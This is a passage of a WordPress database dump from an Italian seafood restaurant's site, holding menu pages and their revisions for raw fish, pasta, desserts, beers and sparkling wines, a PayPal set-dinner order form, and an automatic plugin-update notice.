38,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di mazzancolle su crumble di nocciole e foie gras con confettura di cipolla di tropea</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tavolozza di crudità</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di tonno con  pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di orata con zenzero e mela verde</em>\r\n\r\n<em>€13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il carpaccio di ricciola alla mediterranea </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le fettuccine di spigola alla carbonara </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli scampi nostrani crudi</em>\r\n\r\n<em>€ 9,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place, coperto e servizio 3,00 €</em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo è stato sottoposto a </em>\r\n\r\n<em>trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>','Pesce Crudo','','publish','closed','open','','pesce-crudo','','','2019-02-12 14:17:29','2019-02-12 13:17:29','',10,'http://www.ristorantesolymar.it/?page_id=49',3,'page','',0),(50,1,'2015-07-29 21:29:23','2015-07-29 19:29:23','<em>… Il Crudo</em>\r\n\r\n<em>Tartara di scampi su centrifugato di zucchine e mela verde con bufala e profumo di menta</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em>Tavolozza di crudità</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di tonno  pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di orata con zenzero e mela verde</em>\r\n\r\n<em>€12,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di baccala con spuma di pomodoro, olive taggiasche e pesto all’origano fresco</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di spigola affumicato a freddo da noi, sedano e arancio</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Scampi nostrani crudi</em>\r\n\r\n<em>€ 8,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place, pane fatto in casa € 3,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo o praticamente crudo è stato sottoposto a trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante a causa della difficoltà di reperire Sempre prodotti freschi, talvolta possono essere utilizzati prodotti surgelati all’origine, tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>','Pesce Crudo','','inherit','open','open','','49-revision-v1','','','2015-07-29 21:29:23','2015-07-29 19:29:23','',49,'http://www.ristorantesolymar.it/2015/07/29/49-revision-v1/',0,'revision','',0),(51,1,'2015-07-29 21:30:07','2015-07-29 19:30:07','<em>La Pasta</em>\r\n\r\n<em>Passatelli asciutti, con Sogliole nostrane, fiori di zucca e tartufo nero </em>\r\n\r\n<em>€15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine del \"Pastificio Mancini\" con crema di peperoni dolci, tonno affumicato e bottarga fatta da noi</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tortelli ripieni di patate e stracciatella di bufala con ragù di astice, pomodorini e basilico</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tagliatelle al ragù… Di Pesce</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> Gnocchi vongole, canocchie e stridoli</em>\r\n\r\n<em>€ 14,00</em>\r\n\r\n&nbsp;\r\n\r\n<em><strong>Per chi non mangia pesce</strong></em>\r\n\r\n<em> </em>\r\n\r\n<em>Gnocchi con pomodoro fresco e basilico</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','La Pasta','','publish','closed','open','','la-pasta','','','2020-07-21 20:25:41','2020-07-21 18:25:41','',10,'http://www.ristorantesolymar.it/?page_id=51',0,'page','',0),(52,1,'2015-07-29 21:30:07','2015-07-29 19:30:07','<em>La Pasta</em>\r\n\r\n<em>Tagliolino con filetti di sgombro all’arancio e menta, pomodorini e melanzane</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Passatelli asciutti con spigola , vongole,  stridoli e pomodorini</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine del pastificio Mancini con crema di peperoni dolci,</em>\r\n\r\n<em>Tonno affumicato e Bottarga</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghettino del pastificio Mancini all’acqua d’olive, con pomodorini passiti,</em>\r\n\r\n<em>Colatura e Alici affumicate da noi</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Mezzelune ripiene di Gamberi e ricotta con pendolini scottati e</em>\r\n\r\n<em>profumo di basilico</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Risotto tradizionale alla marinara *min. 2 porz. – tempo cottura 30’</em>\r\n\r\n<em>€ 13,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghetti all’astice e pendolini *min. 2 porz.</em>\r\n\r\n<em>€ 16,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em>Bis di primi piatti *escluso risotto e spaghetti all astice *min. 2 porz)</em>\r\n\r\n<em>€  13,00 a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>           La Pasta ,per i vegetariani e vegani </em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghettino Mancini al pesto di basilico e tofu (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Strozzapreti con ragù di seitan (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine alla carbonara (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> Secondo legge N. art 145 .Nel nostro ristorante  possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>','La Pasta','','inherit','open','open','','51-revision-v1','','','2015-07-29 21:30:07','2015-07-29 19:30:07','',51,'http://www.ristorantesolymar.it/2015/07/29/51-revision-v1/',0,'revision','',0),(54,1,'2015-07-29 21:31:31','2015-07-29 19:31:31','<strong><em>Le dolcezze</em></strong>\r\n\r\n&nbsp;\r\n\r\n<em>“Il Parfait al croccantino e spuma  zabaione”                                        € 7,00                </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em><em>“Crema Catalana 2.0”                                                                                 € 7,00</em>\r\n\r\n<em>  </em>\r\n\r\n<em>  “Pina Colada”                                                                                               € 7,00                                                                                      </em>\r\n\r\n<em> </em><em>“ Tocca l\'Albicocca ”                                                                                    </em>\r\n\r\n<em>  </em>\r\n\r\n<em> Il tortino al cioccolato con cuore fondente, gelato al caramello salato (tempo di cott. 15min)    € 8,00</em>\r\n\r\n&nbsp;\r\n\r\n<em>La frutta fresca</em>\r\n\r\n<em>Ananas                                                                                                                     € 5,oo</em>','I Dolci','','publish','closed','open','','i-dolci','','','2020-07-21 20:04:14','2020-07-21 18:04:14','',10,'http://www.ristorantesolymar.it/?page_id=54',5,'page','',0),(55,1,'2015-07-29 21:31:31','2015-07-29 19:31:31','<em>Dolcezze</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Pina Colada”</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>“ Dolci inganni”</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>Soffice di mascarpone alle fragole, sorbetto alla mela verde e babà alla menta(analcolico)</em>\r\n\r\n<em>€,7oo</em>\r\n\r\n<em>La Crema Catalana</em>\r\n\r\n<em>€ 5,5o</em>\r\n\r\n<em>Parfait al Croccantino e Spuma di Zabaione</em>\r\n\r\n<em>€ 6,5o</em>\r\n\r\n<em>Brownie Cioccolato e Liquirizia,</em>\r\n\r\n<em>gelato alla menta e cioccolata bianco</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>Tortino al Cioccolato con cuore fondente,</em>\r\n\r\n<em>gelato al Caramello Salato (tempo di cott. 15)</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>Semifreddo Stracciatella e Mascarpone </em><em>(gelateria Snoopy)</em>\r\n\r\n<em>€ 5,oo</em>\r\n\r\n<em>Cocco, banana e ananas</em>\r\n\r\n<em>Vegano senza latticini ne alimenti animali</em>\r\n\r\n<em>€ 6,50</em>\r\n\r\n<em>Sorbetto al caffè</em>\r\n\r\n<em>€ 4,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Per i più Piccoli  il Gelato alla vaniglia</em>\r\n\r\n<em>€ 3,00</em>\r\n\r\n<em>La frutta fresca</em>\r\n\r\n<em>Ananas    </em><em>€ 5,oo</em>','I Dolci','','inherit','open','open','','54-revision-v1','','','2015-07-29 21:31:31','2015-07-29 19:31:31','',54,'http://www.ristorantesolymar.it/2015/07/29/54-revision-v1/',0,'revision','',0),(56,1,'2015-07-29 21:32:56','2015-07-29 19:32:56',' ','','','publish','open','closed','','56','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=56',9,'nav_menu_item','',0),(57,1,'2015-07-29 21:32:56','2015-07-29 19:32:56',' ','','','publish','open','closed','','57','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=57',7,'nav_menu_item','',0),(58,1,'2015-07-29 21:32:56','2015-07-29 19:32:56',' ','','','publish','open','closed','','58','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=58',8,'nav_menu_item','',0),(59,1,'2015-07-29 21:32:56','2015-07-29 19:32:56',' ','','','publish','open','closed','','59','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=59',6,'nav_menu_item','',0),(60,1,'2015-07-29 21:42:26','2015-07-29 19:42:26','<h2>Menu\' Creativo per 2 persone</h2>\r\nBenvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 98,00 (Escluso Bavande)\r\n<h2>Menu\' creativo per 2 persone + bere</h2>\r\nMenu\' creativo + 1 bottiglia di vino + 2 caffe\' + 1 bottiglia d\'acqua\r\nEuro 120\r\n\r\n&nbsp;\r\n<h2>Menu\' Storico per 2 persone</h2>\r\nCalamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 90,00 (Escluso Bavande)\r\n<h2>Menu\' storico per 2 persone + bere</h2>\r\nMenu\' storico per due persone con 1 bottiglia di vino 2 caffè e una bottiglia d\'acqua\r\nEuro 115\r\n\r\n\r\n\r\n\r\n<form target=\"paypal\" action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"YDDAGXBWAKA8U\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Scegli Menù\">Scegli Menù</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"Creativo x 2 persone\">Creativo x 2 persone €98,00 EUR</option>\r\n	<option value=\"Creativo x 2 persone + bere\">Creativo x 2 persone + bere €120,00 EUR</option>\r\n	<option value=\"Storico x 2 persone\">Storico x 2 persone €90,00 EUR</option>\r\n	<option value=\"Storico x 2 persone + bere\">Storico x 2 persone + bere €115,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Nominativi\">Nominativi</td></tr><tr><td><input type=\"text\" name=\"os1\" maxlength=\"200\"></td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Telefono\">Telefono</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_cart_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Acquista Cena','','inherit','open','open','','36-revision-v1','','','2015-07-29 21:42:26','2015-07-29 19:42:26','',36,'http://www.ristorantesolymar.it/2015/07/29/36-revision-v1/',0,'revision','',0),(3712,0,'2021-01-14 13:22:34','2021-01-14 12:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.1 to 3.1.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-29','','','2021-01-14 13:22:34','2021-01-14 12:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-29/',0,'postman_sent_mail','',0),(62,1,'2015-07-29 21:48:25','2015-07-29 19:48:25','[pagelist_ext child_of=\"2\"]','Menù','','inherit','open','open','','10-autosave-v1','','','2015-07-29 21:48:25','2015-07-29 19:48:25','',10,'http://www.ristorantesolymar.it/2015/07/29/10-autosave-v1/',0,'revision','',0),(63,1,'2015-07-29 21:48:33','2015-07-29 19:48:33','[pagelist_ext child_of=\"2\"]','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 21:48:33','2015-07-29 19:48:33','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(64,1,'2015-07-29 21:50:18','2015-07-29 19:50:18','[pagelist_ext child_of=\"current\" limit_content=\"200\"]','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 21:50:18','2015-07-29 19:50:18','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(65,1,'2015-07-29 21:53:39','2015-07-29 19:53:39','[pagelist_ext child_of=\"current\" limit_content=\"200\"]','Carta dei Vini','','inherit','open','open','','22-revision-v1','','','2015-07-29 21:53:39','2015-07-29 19:53:39','',22,'http://www.ristorantesolymar.it/2015/07/29/22-revision-v1/',0,'revision','',0),(66,1,'2015-07-29 21:56:52','2015-07-29 19:56:52',' ','','','publish','open','closed','','66','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=66',31,'nav_menu_item','',0),(67,1,'2015-07-30 10:14:27','2015-07-30 08:14:27','','11059770_10154021915942738_6099049076285366168_n','','inherit','open','open','','11059770_10154021915942738_6099049076285366168_n','','','2017-07-06 23:33:02','2017-07-06 21:33:02','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n.jpg',0,'attachment','image/jpeg',0),(68,1,'2015-07-30 10:24:23','2015-07-30 08:24:23','http://www.ristorantesolymar.it/wp-content/uploads/2015/07/cropped-11059770_10154021915942738_6099049076285366168_n.jpg','cropped-11059770_10154021915942738_6099049076285366168_n.jpg','','inherit','open','open','','cropped-11059770_10154021915942738_6099049076285366168_n-jpg','','','2015-07-30 10:24:23','2015-07-30 08:24:23','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/07/cropped-11059770_10154021915942738_6099049076285366168_n.jpg',0,'attachment','image/jpeg',0),(69,1,'2015-08-03 14:39:30','2015-08-03 12:39:30','<u>     SOL Y MAR</u>\r\n<p style=\"text-align: center\"><strong><u>Birre speciali</u></strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Birra Amarcord</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: left\">       Gradisca              Lager Chiara                                                                                                              €   7,00</p>\r\n<p style=\"text-align: left\">       Midòna                Golden Ale                                                                                                                  €   7,0o</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>Ichnusa</strong><strong> </strong></p>\r\n<p style=\"text-align: left\">       Cruda                Chiara (sapore secco e beverino) 0,33 l 4,9%                   (no)                               €  3,00</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>32 via dei birrai</strong></p>\r\n<p style=\"text-align: left\">       Curmi al farro  (beverina, rinfrescante, lievemente acidula, di medio corpo) 0,750 l 5,8%       € 11,50</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>Birra Perugia</strong></p>\r\n<p style=\"text-align: left\"><strong> </strong></p>\r\n<strong>     </strong> Golden ale       Chiara (beverina,profumi freschi e vivaci) 0,330 l 5,2%                                         €  6,00\r\n\r\nGolden ale         Chiara (beverina,profumi freschi e vivaci) 0,750 l 5,2%                                       € 11,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<pre></pre>','Birre','','publish','closed','open','','birre','','','2020-10-24 23:01:19','2020-10-24 21:01:19','',22,'http://www.ristorantesolymar.it/?page_id=69',4,'page','',0),(70,1,'2015-08-03 14:39:30','2015-08-03 12:39:30','<strong><u>Birre speciali</u></strong>\r\n\r\n<strong><u>italia</u></strong>\r\n\r\n<strong>Baladin      </strong>\r\n\r\nIsaac <strong>    </strong>       <strong> </strong>(speziata,fresca al palato , corpo leggero)     0,375  ml vol 5,0 %        €    6,00\r\n\r\nIsaac<strong>     </strong>       <strong> </strong>(speziata,fresca al palato , corpo leggero)     0,750  ml vol 5,0 %         €  11,50\r\n\r\n<strong>Almond’ 22                   </strong>\r\n\r\nBlance de valerie    (farro,dissetante,agrumata,floreale)  750ml vol 4,5%                €  11,50\r\n\r\nVanilla                     (speziata vanigliata)                               750ml vol 5,3%               €  11,50\r\n\r\nIrie                             (agrumi,miele,bassa gasatura,secca)    750ml vol 5,0%             €  11,50\r\n\r\nPink ipa        (ambrata fresca,speziata,beverina,agrumi)    375ml vol 6,0%             €    7,00\r\n\r\n<strong>32 via dei birrai</strong>\r\n\r\nCurmi al farro (beverina, rinfrescante, lievemente acidula, di medio corpo)            750ml vol 5,8%            €  11,50\r\n\r\nOppale ale (corposa, luppolata, note di caramello)              750ml vol 5,5%            €  11,50\r\n\r\n<strong>Birrificio di Franciacorta</strong>\r\n\r\nBirra Chiara         (poco amara,leggera)                                750ml vol 5,2% €  11,50\r\n\r\n<strong>Birradamare</strong>\r\n\r\nNa biretta chiara   (beverina,maltata)                        330ml vol 4,9%            €    6,00\r\n\r\n<strong>Birrificio del Ducato</strong>\r\n\r\nVia Emilia  ( floreale, erbacea ,con finale secco)                    750ml vol 5,5%            €  11,50\r\n\r\nAfo   ( interpretazione delle Ales, corpo pieno aroma fruttato)          330ml vol 5,4%            €    6,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Belgio</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong>Brasserie  Caracole</strong>\r\n\r\nSaxo               (gusto dolce,mielosa,fruttata, agrumata)         330ml vol 7,5%            €   5,00\r\n\r\n<strong>Brasserie  Du Bocq </strong>\r\n\r\nBlanc de Namur ( morbida ,leggermente dolce, rinfrescante)750ml vol 4,5%         €  11,50\r\n\r\n&nbsp;\r\n\r\n<strong>Brasserie Lefebvre</strong>\r\n\r\nBlanche de Bruxelles  (gusto piacevolmente fresco, leggero aroma agrodolce 0,750 ml . 4,5% €  9,50\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>Scozia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong>Brew Dog</strong>\r\n\r\n&nbsp;\r\n\r\nPunk Ipa      (fresca, agrumata, biscottata, frutta tropicale)  330ml vol 5,6%            €   5,50\r\n\r\n&nbsp;\r\n\r\n<strong><u>Germania</u></strong>\r\n\r\n<strong>Maxlrainer</strong>\r\n\r\nPils                      (luppolata, gusto semplice e luppolato)  330 ml vol 4,9%            €    3,50\r\n\r\n<strong>Schonram</strong>\r\n\r\nPils                      (luppolata, gusto semplice e luppolato)  330 ml vol 5,0%            €    3,50\r\n\r\n&nbsp;\r\n\r\n<strong>Weihenstephaner</strong>\r\n\r\nHefe Weissbier        (fresca,scorrevole,saporita,leggermente speziata)500ml vol 5,5%        €   4,50','Birre','','inherit','open','open','','69-revision-v1','','','2015-08-03 14:39:30','2015-08-03 12:39:30','',69,'http://www.ristorantesolymar.it/2015/08/03/69-revision-v1/',0,'revision','',0),(71,1,'2015-08-03 14:41:22','2015-08-03 12:41:22','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n<p style=\"text-align: center\"><strong> </strong><strong><u>Italia</u></strong><u></u></p>\r\n<strong><u>     Toscana</u></strong>\r\n\r\nTunia                             Sottofondo I.G.T. Toscana Bianco frizzante                                € 21,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Marche</u></strong>\r\n\r\nMarotti Campi               Brut Rosè                                                                                              € 20,00\r\n\r\nLa Staffa                          Mai sentito Igt Marche Frizzante sur le lie                                    € 20,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania </u></strong>\r\n\r\nCiro Picariello                Spumante metodo classico Brut Contadino                                   € 27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','publish','closed','open','','franciacorta','','','2020-10-24 23:08:13','2020-10-24 21:08:13','',22,'http://www.ristorantesolymar.it/?page_id=71',5,'page','',0),(72,1,'2015-08-03 14:41:22','2015-08-03 12:41:22','<strong>Franciacorta</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nBellavista<strong>          </strong>Cuvèe Brut docg                                                                           €  32,00\r\n\r\nGran Cuvèe Brut Rosè                                                                €  41,00\r\n\r\n&nbsp;\r\n\r\nCà del Bosco<strong>      </strong>Cuvèe  Prestige Brut docg                                                          €   32,00\r\n\r\nCuvèe Annamaria Clementi docg                                    € 105,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFaccoli                  Brut     Docg                                                                                   € 23,50\r\n\r\nDosaggio zero  millesimo “09 Docg                                             € 31,00\r\n\r\nRose  brut Docg                                                                               € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMajolini<strong>             </strong>Brut docg                                                                                     €   23,50\r\n\r\nSatèn docg millesimato  “09                                                       €   27,00\r\n\r\n&nbsp;\r\n\r\nMonterossa         P.R. Brut blanc de blancs                                                    €  26,00\r\n\r\nCabochon brut millesimo “09                                               €  45,00\r\n\r\n&nbsp;\r\n\r\nIl Mosnel           Extra Brut Docg  mill.09                                                          €  31,00\r\n\r\nPas dosè Docg                                                                              €  25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVilla                      Brut rosé docg millesimato “10                          €   29,00\r\n\r\nSaten docg millesimato’09                                   €   28,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>Sud Africa…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nPongracz            Metodo classico brut da chardonnay e pinot nero                 €  23,00','Franciacorta','','inherit','open','open','','71-revision-v1','','','2015-08-03 14:41:22','2015-08-03 12:41:22','',71,'http://www.ristorantesolymar.it/2015/08/03/71-revision-v1/',0,'revision','',0),(73,1,'2015-08-03 14:43:39','2015-08-03 12:43:39','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<u> </u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong>                               </strong>\r\n\r\nSan Patrignano             Aulente Bianco                                                                  € 9,00\r\n<p style=\"text-align: center\">Donnafugata                  Anthilia I.G.T.                                                                    € 10,00</p>\r\n<p style=\"text-align: center\">Umani Ronchi               Verdicchio Casal Di Serra                                                € 10,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Bollicine</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\">Laherte Freres            Champagne Brut Ultradition   (assemblage)              € 28,00</p>\r\n<p style=\"text-align: center\"> Bonnet Gilmert               Champagne BdB Cuvèe de riserve Brut GC            € 30,00</p>\r\n<p style=\"text-align: center\">  Jean Vesselle                     Champagne Brut Rosè de Saignèe                          € 30,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n<p style=\"text-align: center\">San Patrignano              Aulente Rosso                                                              € 9,00</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','I piccoli formati da 0.375','','publish','closed','closed','','birre-2','','','2020-10-24 22:58:24','2020-10-24 20:58:24','',22,'http://www.ristorantesolymar.it/?page_id=73',2,'page','',0),(74,1,'2015-08-03 14:43:39','2015-08-03 12:43:39','<strong><u>Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCave de Morgex         Extra brut metodo classico(100% prié blanc)            €  23,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                          Luigi Coppo Brut                                                              € 23,00\r\n\r\nEttore Germano                    Alta Langa brut Doc                                                        € 27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nSopra le righe                Pinot nero v.i.b. Oltrepò Pavese doc                             € 14,50\r\n\r\nCà dei Frati                    Brut Rosè                                                                            € 24,50\r\n\r\n&nbsp;\r\n\r\n<strong><u>Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                              Trento doc Dosaggio Zero                                                € 24,00\r\n\r\nTrento doc Rosè                                                                 € 24,00\r\n\r\nPaladino trento doc millesimo(bio)                            € 43,00\r\n\r\n&nbsp;\r\n\r\nPojer e Sandri            Brut Rosè                                                                            €  30,00\r\n\r\nBalter                                Trento doc Brut Chardonnay                                         €  21,00\r\n\r\nAbate Nero                        Trento doc extra brut                                                 €  24,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                          Prosecco Valdobbiadene docg Brut Bosco di Giga     € 17,00\r\n\r\nCartizze Valdobbiadene superiore docg                       € 25,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Emilia Romagna</u></strong>\r\n\r\n&nbsp;\r\n\r\nCavim                          Pignoletto Frizzante Doc                                                €  13,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Marche</u></strong>\r\n\r\n&nbsp;\r\n\r\nMarotti Campi               Brut Rosè                                                                            €  16,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Sicilia</u></strong>\r\n\r\n&nbsp;\r\n\r\nMurgo                          Brut Rosè Met. Classico                                                  €  22,00','Le mille e una bollicina','','inherit','open','open','','73-revision-v1','','','2015-08-03 14:43:39','2015-08-03 12:43:39','',73,'http://www.ristorantesolymar.it/2015/08/03/73-revision-v1/',0,'revision','',0),(75,1,'2015-08-03 14:45:33','2015-08-03 12:45:33','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n<strong><u> </u></strong>\r\n<p style=\"text-align: center\"><strong><u>Italia</u></strong></p>\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n<p style=\"text-align: 